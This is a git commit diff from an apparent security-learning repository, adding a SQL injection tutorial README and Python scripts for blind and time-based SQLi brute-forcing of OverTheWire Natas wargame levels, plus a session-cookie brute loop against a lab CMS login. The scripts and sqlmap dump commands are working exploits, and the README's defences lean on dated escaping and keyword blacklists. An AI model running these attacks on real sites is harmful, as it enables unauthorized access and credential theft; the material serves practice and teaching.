web exploit

2025-05-02 23:05:11 -04:00 · 2014-11-19 15:55:54 -05:00 · 2014-11-19 15:55:54 -05:00 · 662953c17a
commit 662953c17a
parent a0c026ca27
17 changed files with 201 additions and 119 deletions
--- a/Web_Security/SQLi/README.md
+++ b/Web_Security/SQLi/README.md
@ -0,0 +1,151 @@
+# SQL Injections (SQLi)
+
+![](http://i.imgur.com/AcVJKT2.png)
+
+* A SQL query  search can be easily manipulated and assume that a SQL query search is a reliable command. This means  that SQL searches are capable of passing, unnoticed, by access control mechanisms. 
+* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database. 
+
+## The Simplest Example
+
+A parameter passed for a name of a user:
+
+```
+SELECT * FROM users WHERE
+name="$name";
+```
+
+In this case, the attacker just needs to introduce a true logical expression like ```1=1```:
+
+```
+SELECT * FROM users WHERE 1=1;
+```
+So that the **WHERE** clause is always executed, which means that it will return the values that match to all users.
+
+Nowadays it is estimated that less than 5% of the websites have this vulnerability.
+
+These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows.
+
+## Blind SQL Injection
+
+It's estimated that over 20% of the websites have this flow.
+
+In traditional SQLi it is possible to reveal the information by the attacker writing a payload. In the blind SQLi, the attacker needs to ask the server if something is TRUE or FALSE. For example, you can ask for a user. If the user exists, it will load the website, so it's true.
+
+Every time you see an URL, the **question mark** followed by some type of letter or word means that a value is being sent from a page to another.
+
+In the example
+```
+http://www.website.com/info.php?id=10
+```
+the page *info.php* is receiving the data and will have some code like:
+```
+$id=$_post['id'];
+```
+and an associated SQL query:
+```
+QueryHere = "select * from information where code='$id'"
+```
+### Common ways of Exploitation
+
+#### Checking for vulnerability
+We can start to verifying whether the target is vulnerable by attaching a simple quote symbol ```'``` in the end of the URL:
+
+```
+http://www.website.com/info.php?id=10'
+```
+
+If the website returns the following error:
+
+	You have an error in your SQL syntax...
+
+It means that this website is vulnerable to SQL.
+
+#### Find the structure of the database
+To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).  
+
+This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.
+
+* ORDER BY: it tries to order all columns form x to infinity. The iteration stops when the response shows that the input column x does not exist, reveling the value of x.
+
+* UNION: it gathers several data located in different table columns. The automated process tries to gather all information contained in columns/table x,y,z obtained by ORDER BY. The payload is similar to:
+
+```
+?id=5'%22union%22all%22select%221,2,3
+```
+
+* Normally the databases are defined with names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses a trial and error technique to try to identify the name:
+
+```
+?id=5'%22union%22all%22select%221,2,3%22from%22admin
+```
+So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases):
+
+```
+$ ./sqlmap.py -u <WEBSITE> --dbs
+(...)
+[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic
+[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic
+[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic
+[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
+[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*'
+[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+[12:59:27] [WARNING] reflective value(s) found and filtering out
+[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
+[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
+[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
+(...)
+```
+
+#### Gaining access to the Database
+
+* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
+
+```
+./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
+``` 
+
+* The main objective is to find  usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
+
+```
+./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
+``` 
+
+This will return information about the columns in the given table.
+
+* Now we can dump all the data of all columns using the flag ```-C``` for column names:
+
+```
+./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
+```
+
+If the password are clear text (not hashed in md5, etc), we have access to the website.
+
+## Some Protection Tips
+
+* Never connect to a database as a super user or as a root.
+* Sanitize any user input. PHP has several functions that validate functions such as:
+	- is_numeric()
+	- ctype_digit()
+	- settype()
+	- addslahes()
+	- str_replace()
+* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
+	- mysql_real_escape_string()
+	- sqlit_escape_string()
+
+```php
+$name = 'John';
+$name = mysql_real_escape_string($name);
+$SQL = "SELECT * FROM users WHERE username='$name'";
+```
+
+* Always perform a parse of data that is received from the user (POST and FORM methods). 
+	- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
+	- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
+
+* Do not display explicit error messages that show the request or a part of the SQL request.
+
+* Erase user accounts that are not used (and default accounts).
+
+* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.
+
--- a/Web_Security/SQLi/sqli_16_brute_force_password.py
+++ b/Web_Security/SQLi/sqli_16_brute_force_password.py
@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+import string
+
+
+def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
+
+        password = ''
+
+        for i in range(1, LENGTH+1):
+            for j in range (len(CHARS)):
+
+                r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
+                print r.url
+
+                if KEYWORD in r.text:
+                        password += CHARS[j]
+                        print("Password so far: " + password)
+                        break
+
+        return password
+
+
+
+if __name__ == '__main__':
+
+        # authorization: login and password
+        AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
+
+
+        # BASE64 password and 32 bytes
+        CHARS = string.ascii_letters + string.digits
+        LENGTH = 32
+
+        # crafted url option
+        SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
+        SQL_URL2 = ',1) LIKE BINARY "'
+        KEYWORD = 'exists'
+
+        print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))
+
--- a/Web_Security/SQLi/sqli_18_timed_SQLi.py
+++ b/Web_Security/SQLi/sqli_18_timed_SQLi.py
@ -0,0 +1,46 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+import string
+
+
+def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
+
+        password = ''
+
+        for i in range(1, LENGTH+1):
+            for j in range (len(CHARS)):
+                r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
+                time =  r.elapsed.total_seconds()
+
+                print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
+                #print r.url
+                if time >= 9:
+                    password += CHARS[j]
+                    print("Password so far: " + password)
+                    break
+
+        return password
+
+
+
+if __name__ == '__main__':
+
+        # authorization: login and password
+        AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
+
+
+        # BASE64 password and 32 bytes
+        CHARS = string.ascii_letters + string.digits
+        LENGTH = 32
+
+        # crafted url option 1
+        SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
+        SQL_URL2 = ',1) LIKE BINARY "'
+        SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
+
+        print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))
+
--- a/Web_Security/SQLi/sqli_COOKIE_brute.py
+++ b/Web_Security/SQLi/sqli_COOKIE_brute.py
@ -0,0 +1,47 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+
+
+def brute_force_password(URL, PAYLOAD, MAXID):
+
+    for i in range(MAXID):
+        #HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
+        r = requests.post(URL, params=PAYLOAD)
+        
+	print(i)
+	print r.text
+	id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
+	print(id_hex.decode('hex'))
+
+
+     
+
+if __name__ == '__main__':
+
+    #AUTH = ('admin', 'password')
+    URL = 'http://10.13.37.12/cms/admin/login.php'
+
+    PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
+    MAXID = 640
+
+    brute_force_password(URL, PAYLOAD, MAXID)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+